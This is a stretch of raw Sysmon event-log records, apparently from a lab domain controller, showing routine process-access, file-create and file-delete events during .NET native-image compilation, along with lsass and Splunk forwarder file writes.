21:01:14.389{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A11A-60D3-7902-00000000CF01}3492C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018863Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:14.373{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A11A-60D3-7902-00000000CF01}3492C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000018862Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:14.373{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A11A-60D3-7902-00000000CF01}3492C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018861Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:14.310{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A11A-60D3-7802-00000000CF01}5140C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018860Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:14.295{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A11A-60D3-7802-00000000CF01}5140C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000018859Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:14.295{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A11A-60D3-7802-00000000CF01}5140C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018905Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:15.904{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A11B-60D3-8102-00000000CF01}7020C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018904Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:15.904{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A11B-60D3-8102-00000000CF01}7020C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000018903Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:15.904{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A11B-60D3-8102-00000000CF01}7020C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018902Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:15.857{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A11B-60D3-8002-00000000CF01}3256C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018901Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:15.842{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A11B-60D3-8002-00000000CF01}3256C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000018900Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:15.842{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A11B-60D3-8002-00000000CF01}3256C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000018899Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:15.795{4DB9351A-A11B-60D3-7F02-00000000CF01}3656NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\7ENBCLX6YT\System.Net.Http.WebRequest.ni.dll.auxMD5=504853C28422844FC7509FFA96E52CA9,SHA256=53815D7F51C00EF70A7ABAE2D25FDF7062426642C18C095E713F5D16D98AF5D7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000018898Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:15.795{4DB9351A-A11B-60D3-7F02-00000000CF01}3656NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\7ENBCLX6YT\System.Net.Http.WebRequest.ni.dllMD5=1E63037F7416695E734762C5DBBE6929,SHA256=CA07D8FC2F9834B56770B119201E35AB97A97D2178C16EC81A60CD4CF4B41011,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000018897Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:15.795{4DB9351A-9DDB-60D3-0B00-00000000CF01}628NT AUTHORITY\SYSTEMC:\Windows\system32\lsass.exeC:\Windows\System32\config\netlogon.dnsMD5=861E2074A54ACE92E0D7764F2EBC2E68,SHA256=AF5176FA16B0F48B5D355A1B7C9F0933E8B98C089F1CFCCCAA9D2735DEE3D866,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000018896Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:01:15.795{4DB9351A-A11B-60D3-7F02-00000000CF01}3656C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\e48-0\System.Net.Http.WebRequest.dll2021-06-23 21:01:15.795 23542300x800000000000000018895Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:15.795{4DB9351A-9DDB-60D3-0B00-00000000CF01}628NT AUTHORITY\SYSTEMC:\Windows\system32\lsass.exeC:\Windows\System32\config\netlogon.dnbMD5=595F47A7B05E23A5F6060F0F4BB3716E,SHA256=1C755D4845DC45A3D77C8F8E47353B2700174C9BFB57B883899FC274744AD2A8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000018894Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:15.764{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3474C857098CA46AA1D5BA7C2C26D8F8,SHA256=14139E67F4AC703AF97B2558CC44B25FA5FFD21A953B4947BDF5136EE4130A7E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000018893Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:15.748{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A11B-60D3-7F02-00000000CF01}3656C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018892Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:15.748{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A11B-60D3-7F02-00000000CF01}3656C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000018891Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:15.748{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A11B-60D3-7F02-00000000CF01}3656C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018890Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:15.701{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A11B-60D3-7E02-00000000CF01}1080C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018889Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:15.685{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A11B-60D3-7E02-00000000CF01}1080C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000018888Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:15.685{4DB9351A-A036-60D3-1601-00000000CF01}6804348C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A11B-60D3-7E02-00000000CF01}1080C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000018887Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:15.623{4DB9351A-A11B-60D3-7D02-00000000CF01}2536NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\85LYOGT8IU\System.Net.ni.dll.auxMD5=9B0174DFB6E63E3BA23B1440E9E50A4E,SHA256=38BDBF0ADC5D46FBA26989747CB3C97FB0278961D993131D4F88288075B80A4F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000018886Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:15.623{4DB9351A-A11B-60D3-7D02-00000000CF01}2536NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\85LYOGT8IU\System.Net.ni.dllMD5=26CD332634E040FA786C5691506B4366,SHA256=A61744EAB77DC7829352DA5318C8EB1B3B51159F43AE56806226006CBF72DE19,IMPHASH=00000000000000000000000000000000truetrue 11241100x800000000000000018885Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:01:15.607{4DB9351A-A11B-60D3-7D02-00000000CF01}2536C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\9e8-0\System.Net.dll2021-06-23 21:01:15.607 10341000x800000000000000018884Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:15.342{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A11B-60D3-7D02-00000000CF01}2536C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018883Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:15.326{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A11B-60D3-7D02-00000000CF01}2536C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000018882Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:15.326{4DB9351A-A036-60D3-1601-00000000CF01}6805292C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{4DB9351A-A11B-60D3-7D02-00000000CF01}2536C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000018881Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:01:15.185{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A11B-60D3-7C02-00000000CF01}7032C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\W